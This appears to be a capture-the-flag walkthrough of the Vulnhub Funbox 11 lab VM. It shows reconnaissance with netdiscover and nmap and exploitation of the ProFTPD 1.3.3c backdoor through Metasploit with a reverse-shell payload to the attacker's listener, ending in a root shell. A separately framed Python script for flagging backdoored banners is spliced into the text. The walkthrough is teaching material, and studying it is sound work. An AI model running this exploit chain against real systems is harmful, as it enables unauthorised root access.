Vulnhub: Funbox 11 (Scriptkiddie) target machine walkthrough

Funbox 11 (Scriptkiddie)

Author: jason_huawen

Target information

Name: Funbox: Scriptkiddie

Address:

https://www.vulnhub.com/entry/funbox-scriptkiddie,725/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Funbox11]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                              
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:5c:67:d7      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.208  08:00:27:4b:7d:cc      1      60  PCS Systemtechnik GmbH         

Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.208.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Funbox11]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.208 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-08 07:51 EST
Nmap scan report for 192.168.56.208
Host is up (0.00011s latency).
Not shown: 65527 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.3.3c
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a60e30353bef4344f51cd7c658640992 (RSA)
|   256 c2d8bd62bf138928f861e0a6c4f7a5bf (ECDSA)
|_  256 12606e58eef2bd9cffb03505830871b8 (ED25519)
25/tcp  open  smtp        Postfix smtpd
| ssl-cert: Subject: commonName=funbox11
| Not valid before: 2021-07-19T16:52:14
|_Not valid after:  2031-07-17T16:52:14
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: funbox11, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: WordPress 5.7.2
|_http-title: Funbox: Scriptkiddie
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: TOP SASL PIPELINING CAPA UIDL RESP-CODES AUTH-RESP-CODE
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: more LOGIN-REFERRALS capabilities have post-login ID OK listed ENABLE SASL-IR Pre-login LOGINDISABLEDA0001 IDLE IMAP4rev1 LITERAL+
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:4B:7D:CC (Oracle VirtualBox virtual NIC)
Service Info: Hosts:  funbox11, FUNBOX11; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: funbox11
|   NetBIOS computer name: FUNBOX11\x00
|   Domain name: \x00
|   FQDN: funbox11
|_  System time: 2023-01-08T13:52:10+01:00
|_nbstat: NetBIOS name: FUNBOX11, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
|_clock-skew: mean: -20m01s, deviation: 34m37s, median: -2s
| smb2-time: 
|   date: 2023-01-08T12:52:10
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.36 seconds

Getting a shell

Port 21

┌──(kali㉿kali)-[~/Vulnhub/Funbox11]
└─$ ftp 192.168.56.208 
Connected to 192.168.56.208.
220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [192.168.56.208]
Name (192.168.56.208:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password: 
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Funbox11]
└─$ searchsploit ProFTPD 1.3.3c                                
------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                             |  Path
------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution                         | linux/remote/15662.txt
ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)                                   | linux/remote/16921.rb
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Anonymous FTP login is refused (530 Login incorrect), but the banner version, ProFTPD 1.3.3c, matches the searchsploit entries for the compromised-source backdoor, so the first step is to check whether that vulnerability can be exploited here.
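Matching a scan banner against the searchsploit result by hand is how the walkthrough proceeds; as a defender-side aid, the following added example (not part of the original post) parses an Nmap normal-format (-oN) report and flags service banners whose exact product/version pair is in a small watch list. The report text is constructed from the scan above, and the watch list only contains the ProFTPD 1.3.3c entry taken from the searchsploit output on this page; the catalogue structure itself is hypothetical.

```python
import re
from typing import Dict, List, NamedTuple, Tuple

# Constructed sample: the service lines from the Nmap -oN report shown above.
NMAP_REPORT = """\
Nmap scan report for 192.168.56.208
Host is up (0.00011s latency).
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.3.3c
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 5.7.2
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
"""

# Hypothetical watch list keyed by (product, exact version); the single entry is the
# banner searchsploit matched on this page (EDB 15662 / 16921).
KNOWN_BAD: Dict[Tuple[str, str], str] = {
    ("ProFTPD", "1.3.3c"): "compromised-source backdoor (EDB 15662 / 16921); upgrade or remove",
}

class Service(NamedTuple):
    port: int
    proto: str
    name: str
    version: str

# Matches "21/tcp  open  ftp         ProFTPD 1.3.3c"; NSE script lines start with '|'.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

def parse_services(report: str) -> List[Service]:
    """Extract open-port service rows from an Nmap -oN report."""
    services = []
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:
            services.append(Service(int(m.group(1)), m.group(2), m.group(3), m.group(4).strip()))
    return services

def flag_known_bad(services: List[Service]) -> List[Tuple[int, str, str]]:
    """Return (port, banner, note) for banners whose first two tokens are an exact watch-list hit."""
    findings = []
    for svc in services:
        tokens = svc.version.split()
        if len(tokens) >= 2 and (tokens[0], tokens[1]) in KNOWN_BAD:
            findings.append((svc.port, f"{tokens[0]} {tokens[1]}", KNOWN_BAD[(tokens[0], tokens[1])]))
    return findings

if __name__ == "__main__":
    for port, banner, note in flag_known_bad(parse_services(NMAP_REPORT)):
        print(f"port {port}: {banner} -> {note}")
```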

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  exploit/linux/misc/netsupport_manager_agent  2011-01-08       average    No     NetSupport Manager Agent Remote Buffer Overflow
   1  exploit/linux/ftp/proftp_sreplace            2006-11-26       great      Yes    ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   2  exploit/freebsd/ftp/proftp_telnet_iac        2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   3  exploit/linux/ftp/proftp_telnet_iac          2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   4  exploit/unix/ftp/proftpd_modcopy_exec        2015-04-22       excellent  Yes    ProFTPD 1.3.5 Mod_Copy Command Execution
   5  exploit/unix/ftp/proftpd_133c_backdoor       2010-12-02       excellent  No     ProFTPD-1.3.3c Backdoor Command Execution


Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/ftp/proftpd_133c_backdoor

msf6 > use exploit/unix/ftp/proftpd_133c_backdoor
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show options 

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT   21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set RHOSTS 192.168.56.208
RHOSTS => 192.168.56.208
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit

[-] 192.168.56.208:21 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/
set payload cmd/unix/bind_perl                  set payload cmd/unix/reverse_bash_telnet_ssl
set payload cmd/unix/bind_perl_ipv6             set payload cmd/unix/reverse_perl
set payload cmd/unix/generic                    set payload cmd/unix/reverse_perl_ssl
set payload cmd/unix/reverse                    set payload cmd/unix/reverse_ssl_double_telnet
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > show options 

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.56.208   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set LPORT  5555
LPORT => 5555
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.56.206:5555 
[*] 192.168.56.208:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo oMRWoDgpOUFWHMBN;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "oMRWoDgpOUFWHMBN\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.56.206:5555 -> 192.168.56.208:59896) at 2023-01-08 07:57:45 -0500

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
root@funbox11:/# cd /root
cd /root
root@funbox11:/root# ls -alh
ls -alh
total 48K
drwx------  4 root root 4.0K Jul 20  2021 .
drwxr-xr-x 23 root root 4.0K Jul 19  2021 ..
-rw-------  1 root root    5 Jul 20  2021 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
drwx------  2 root root 4.0K Jul 19  2021 .cache
-rw-------  1 root root  149 Jul 20  2021 .mysql_history
drwxr-xr-x  2 root root 4.0K Jul 19  2021 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root 2.3K Jul 20  2021 root.txt
-rw-------  1 root root 4.6K Jul 20  2021 .viminfo
-rw-r--r--  1 root root  167 Jan  8 12:44 .wget-hsts
root@funbox11:/root# cat root.txt
cat root.txt
$$$$$$$$\                  $$\                                                                       
$$  _____|                 $$ |                                                                      
$$ |   $$\   $$\ $$$$$$$\  $$$$$$$\   $$$$$$\  $$\   $$\ $$\                                         
$$$$$\ $$ |  $$ |$$  __$$\ $$  __$$\ $$  __$$\ \$$\ $$  |\__|                                        
$$  __|$$ |  $$ |$$ |  $$ |$$ |  $$ |$$ /  $$ | \$$$$  /                                             
$$ |   $$ |  $$ |$$ |  $$ |$$ |  $$ |$$ |  $$ | $$  $$<  $$\                                         
$$ |   \$$$$$$  |$$ |  $$ |$$$$$$$  |\$$$$$$  |$$  /\$$\ \__|                                        
\__|    \______/ \__|  \__|\_______/  \______/ \__/  \__|                                            
                                                                                                     
                                                                                                     
                                                                                                     
 $$$$$$\                      $$\            $$\     $$\       $$\       $$\       $$\ $$\           
$$  __$$\                     \__|           $$ |    $$ |      \__|      $$ |      $$ |\__|          
$$ /  \__| $$$$$$$\  $$$$$$\  $$\  $$$$$$\ $$$$$$\   $$ |  $$\ $$\  $$$$$$$ | $$$$$$$ |$$\  $$$$$$\  
\$$$$$$\  $$  _____|$$  __$$\ $$ |$$  __$$\\_$$  _|  $$ | $$  |$$ |$$  __$$ |$$  __$$ |$$ |$$  __$$\ 
 \____$$\ $$ /      $$ |  \__|$$ |$$ /  $$ | $$ |    $$$$$$  / $$ |$$ /  $$ |$$ /  $$ |$$ |$$$$$$$$ |
$$\   $$ |$$ |      $$ |      $$ |$$ |  $$ | $$ |$$\ $$  _$$<  $$ |$$ |  $$ |$$ |  $$ |$$ |$$   ____|
\$$$$$$  |\$$$$$$$\ $$ |      $$ |$$$$$$$  | \$$$$  |$$ | \$$\ $$ |\$$$$$$$ |\$$$$$$$ |$$ |\$$$$$$$\ 
 \______/  \_______|\__|      \__|$$  ____/   \____/ \__|  \__|\__| \_______| \_______|\__| \_______|
                                  $$ |                                                               
                                  $$ |                                                               
                                  \__|                                                               

Please, tweet this to: @0815R2d2
Thank you...
root@funbox11:/root# 

Using the Metasploit module directly yields a root shell.

There was no need to even analyze the other ports, haha.

Posted 2023-01-08 21:09 by Jason_huawen